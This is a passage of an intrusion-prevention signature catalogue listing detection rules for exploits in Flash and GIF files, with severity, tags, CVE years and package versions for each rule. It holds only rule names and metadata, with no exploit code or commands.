About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player Desktop Runtime detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-664-5211
Vulnerability: Adobe-Flash-Player-Nellymoser-Datasize-Heap-Buffer-Overflow
Description:
Back to top

File-Flash_Adobe-Flash-Player-OP_inclocal-And-OP_declocal-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-488-5211
Vulnerability: Adobe-Flash-Player-OP_inclocal-And-OP_declocal-Memory-Corruption
Description:
Back to top

File-Flash_Adobe-Flash-Player-Rectangle-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-803-5242
Vulnerability: Adobe-Flash-Player-Rectangle-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-Shader-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-585-5211
Vulnerability: Adobe-Flash-Player-Shader-Memory-Corruption
Description:
Back to top

File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR desktop runtime detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, Adobe Systems AIR SDK, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-658-5211
Vulnerability: Adobe-Flash-Player-Shader-Parameter-Write-What-Where
Description:
Back to top

File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where-2

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR desktop runtime detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, Adobe Systems AIR SDK, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-659-5211
Vulnerability: Adobe-Flash-Player-Shader-Parameter-Write-What-Where
Description:
Back to top

File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where-3

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR desktop runtime detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, Adobe Systems AIR SDK, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Adobe-Flash-Player-Shader-Parameter-Write-What-Where
Description:
Back to top

File-Flash_Adobe-Flash-Player-ShaderJob-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-658-5211
Vulnerability: Adobe-Flash-Player-ShaderJob-Memory-Corruption
Description:
Back to top

File-Flash_Adobe-Flash-Player-Sharedobject-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: Adobe-Flash-Player-Sharedobject-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-SWF-File-Code-Execution

About this situation: Detected an attempt to exploit a vulnerability in Adobe Flash Player
Context: Flash File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2007, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-585-5211
Vulnerability: Adobe-Flash-Player-SWF-File-Code-Execution
Description:
Back to top

File-Flash_Adobe-Flash-Player-SWF-File-Code-Execution-2

About this situation: Detected an attempt to exploit a vulnerability in Adobe Flash Player
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Adobe-Flash-Player-SWF-File-Code-Execution
Description:
Back to top

File-Flash_Adobe-Flash-Player-TextLine-opaqueBackground-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-664-5211
Last changed: sgpkg-ips-1136-5242
Vulnerability: Adobe-Flash-Player-TextLine-opaqueBackground-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Player-Type-Confusion-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 10
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2012, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-466-5211
Vulnerability: Adobe-Flash-Player-Type-Confusion-Memory-Corruption
Description:
Back to top

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-5122

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player was detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-696-5211
Vulnerability: Adobe-Flash-Player-Use-After-Free-CVE-2015-5122
Description:
Back to top

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-8413

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player was detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Vulnerability: Adobe-Flash-Player-Use-After-Free-CVE-2015-8413
Description:
Back to top

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-8430

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Vulnerability: Adobe-Flash-Player-Use-After-Free-CVE-2015-8430
Description:
Back to top

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2016-0988

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Vulnerability: Adobe-Flash-Player-Use-After-Free-CVE-2016-0988
Description:
Back to top

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2016-7892

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, MS2016-12, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-992-5242
Vulnerability: Adobe-Flash-Player-Use-After-Free-CVE-2016-7892
Description:
Back to top

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3058

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-876-5242
Vulnerability: Adobe-Flash-Player-Use-After-Free-CVE-2017-3058
Description:
Back to top

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3059

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-876-5242
Vulnerability: Adobe-Flash-Player-Use-After-Free-CVE-2017-3059
Description:
Back to top

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3062

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-876-5242
Vulnerability: Adobe-Flash-Player-Use-After-Free-CVE-2017-3062
Description:
Back to top

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3063

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-876-5242
Vulnerability: Adobe-Flash-Player-Use-After-Free-CVE-2017-3063
Description:
Back to top

File-Flash_Adobe-Flash-Player-Vulnerability-CVE-2012-1535

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-469-5211
Last changed: sgpkg-ips-469-5211
Vulnerability: Adobe-Flash-Player-Vulnerability-CVE-2012-1535
Description:
Back to top

File-Flash_Adobe-Flash-Selection.setfocus-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Adobe Flash Player Desktop Runtime detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: Adobe-Flash-Selection.setfocus-Use-After-Free
Description:
Back to top

File-Flash_Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4144

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4144
Description:
Back to top

File-Flash_Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4149

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4149
Description:
Back to top

File-Flash_Adobe-Flash-Use-After-Free-CVE-2016-7855

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-817-5242
Last changed: sgpkg-ips-1400-5242
Vulnerability: Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-7855
Description:
Back to top

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4121

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4121
Description:
Back to top

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4142

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4142
Description:
Back to top

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4143

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4143
Description:
Back to top

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4146

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4146
Description:
Back to top

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4147

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4147
Description:
Back to top

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4148

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4148
Description:
Back to top

File-Flash_Adobe-Flash-Vulnerability-CVE-2016-4171

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-771-5211
Vulnerability: Adobe-Flash-Vulnerability-CVE-2016-4171
Description:
Back to top

File-Flash_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-Flash_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: Flash File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Flash_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: Flash File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Flash_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: Flash File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Flash_DoSWF-Obfuscation

About this situation: A suspicious Flash file detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-920-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Flash_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: Flash File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-Flash_Flash-File-In-Non-Standard-Port

About this situation: Flash file download over HTTP in non-standard port detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-672-5211
Description:
Back to top

File-Flash_Flash-From-A-Suspicious-Site

About this situation: Detected a suspicious Flash file
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-892-5242
Description:
Back to top

File-Flash_Generic-Shellcode-3

About this situation: Hex encoded shellcode stubs found in a flash file
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-981-5242
Last changed: sgpkg-ips-981-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Flash_Invalid-Bytecode-CVE-2017-11292

About this situation: A suspicious Flash file detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: Adobe-Flash-Player-Flawed-Bytecode-Verification-CVE-2017-11292
Description:
Back to top

File-Flash_Magnitude-Exploit-Stager

About this situation: A suspicious Flash file detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-927-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Flash_Microsoft-Internet-Explorer-CVE-2016-3327

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-785-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2016-3327
Description:
Back to top

File-Flash_RealNetworks-RealPlayer-FLV-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: Flash File Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, RealPlayer SP, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: RealNetworks-RealPlayer-FLV-Parsing-Two-Integer-Overflow-Vulnerabilities
Description:
Back to top

File-Flash_RealNetworks-RealPlayer-SWF-Flash-File-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks Rhapsody Player detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: RealNetworks-RealPlayer-SWF-Flash-File-Buffer-Overflow
Description:
Back to top

File-Flash_RIG-EK-Exploit

About this situation: A suspicious Flash file detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Flash_SecureSWF-Obfuscation

About this situation: A suspicious Flash file detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Vulnerability: File-Flash_SecureSWF-Obfuscation
Description:
Back to top

File-Flash_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Flash File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-Flash_Suspicious-Content-From-IP-Address-Host

About this situation: Flash file served by HTTP host without domain name detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-963-5242
Last changed: sgpkg-ips-972-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Flash_Suspicious-Content-From-Random-Host

About this situation: Flash file served by host with a random name detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Flash_Suspicious-Email-Content-From-Random-Host

About this situation: Flash file served by host with a random domain name detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1002-5242
Last changed: sgpkg-ips-1334-5242
Description:
Back to top

File-Flash_Suspicious-Flash-File

About this situation: A suspicious Flash file detected
Context: Flash File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Flash_Video-Content-From-IP-Address-Host

About this situation: Flash video file served by HTTP host without domain name detected
Context: Flash File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-972-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-GIF_Adobe-Photoshop-Cs5-Gif-File-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Adobe Photoshop detected
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Adobe-Photoshop-Cs5-Gif-File-Heap-Corruption
Description:
Back to top

File-GIF_Adobe-Reader-Memory-Corruption-CVE-2017-3050

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: Adobe-Reader-Memory-Corruption-CVE-2017-3050
Description:
Back to top

File-GIF_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-GIF_Apple-CUPS-Gif_Read_LZW-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer Common UNIX Printing System (CUPS) detected
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Common UNIX Printing System, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Apple-CUPS-Gif_Read_LZW-Heap-Buffer-Overflow
Description:
Back to top

File-GIF_Apple-Mac-OS-X-Gifgetbandproc-Gif-Image-Handling-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Mac OS X detected
Context: GIF File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: Apple-Mac-OS-X-Gifgetbandproc-Gif-Image-Handling-Integer-Overflow
Description:
Back to top

File-GIF_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: GIF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-GIF_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: GIF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-GIF_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: GIF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Anomalies, Protocol Violations
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-GIF_Contaware-Freevimager-GIF-Lzwminimumcodesize-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Contaware FreeVimager detected
Context: GIF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Contaware FreeVimager, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Vulnerability: Contaware-Freevimager-GIF-Lzwminimumcodesize-Memory-Corruption
Description:
Back to top

File-GIF_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: GIF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-GIF_Embedded-Zip-Archive

About this situation: Embedded zip archive
Context: GIF File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-GIF_IBM-Domino-Gif-Processing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Domino detected
Context: GIF File Stream
Severity: 7
